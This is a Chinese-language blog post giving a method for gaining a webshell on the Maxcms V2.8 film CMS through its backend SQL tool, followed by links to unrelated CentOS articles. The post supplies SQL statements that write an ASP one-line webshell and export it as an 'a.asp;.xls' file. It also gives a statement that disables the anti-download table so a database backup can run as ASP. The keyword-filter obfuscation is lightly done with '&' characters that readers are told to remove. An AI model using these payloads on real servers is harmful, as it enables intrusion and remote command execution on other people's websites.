


Maxcms V2.8電影系統(tǒng)獲取shell
由于本人網(wǎng)站所在服務(wù)器會(huì)過濾某些關(guān)鍵字,過濾成****,所以這里的某些字符我給替換一下,你們懂的!請去掉&就可以了。
程序版本為Maxcms V2.8,而網(wǎng)絡(luò)上有的獲取 shell 版本在2.5。2.5中大部分方法都已經(jīng)不行。
后臺(tái)有個(gè) SQL高級(jí)助手,于是立刻想到兩種思路。第一是通過Access導(dǎo)出a.asp;.Xls的方式。另一種是一句話直接寫入數(shù)據(jù)庫,將其備份為asp程序執(zhí)行。
第一種方法比較好實(shí)現(xiàn)。如下語句就可以辦到。
create table a (a v&a&r&c&h&a&r(50))
insert into a (a) values ('<%e&x&e&cute request("value")%>')
select * into [a] in 'D:\web\a.asp;.xls' 'excel 4.0;' from a
獨(dú)自等待補(bǔ)充:
SELECT '<%e&x&e&cute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
其實(shí)使用這一句話就可以的,但是前提是表a是存在的,原作者的是可以成功的,這里只是多給一種方法。
第二種方式是采用將一句話寫入數(shù)據(jù)庫。備份出來,但由于數(shù)據(jù)庫中存在著防下載表。就算寫進(jìn)了數(shù)據(jù)庫也不一定爆得出源碼,于是在SQL高級(jí)助手處使用如下語句。
update XXXX set notdown=0x
原理就不多說了。自己百度,這樣/inc/datas.asp就能爆出代碼。
通過后臺(tái) → 模板 → 自定義標(biāo)簽處往數(shù)據(jù)庫中寫入一句話,然后從后臺(tái)將數(shù)據(jù)庫備份成asp文件
關(guān)健詞:Maxcms
新文章:
- CentOS7下圖形配置網(wǎng)絡(luò)的方法
- CentOS 7如何添加刪除用戶
- 如何解決centos7雙系統(tǒng)后丟失windows啟動(dòng)項(xiàng)
- CentOS單網(wǎng)卡如何批量添加不同IP段
- CentOS下iconv命令的介紹
- Centos7 SSH密鑰登陸及密碼密鑰雙重驗(yàn)證詳解
- CentOS 7.1添加刪除用戶的方法
- CentOS查找/掃描局域網(wǎng)打印機(jī)IP講解
- CentOS7使用hostapd實(shí)現(xiàn)無AP模式的詳解
- su命令不能切換root的解決方法
- 解決VMware下CentOS7網(wǎng)絡(luò)重啟出錯(cuò)
- 解決Centos7雙系統(tǒng)后丟失windows啟動(dòng)項(xiàng)
- CentOS下如何避免文件覆蓋
- CentOS7和CentOS6系統(tǒng)有什么不同呢
- Centos 6.6默認(rèn)iptable規(guī)則詳解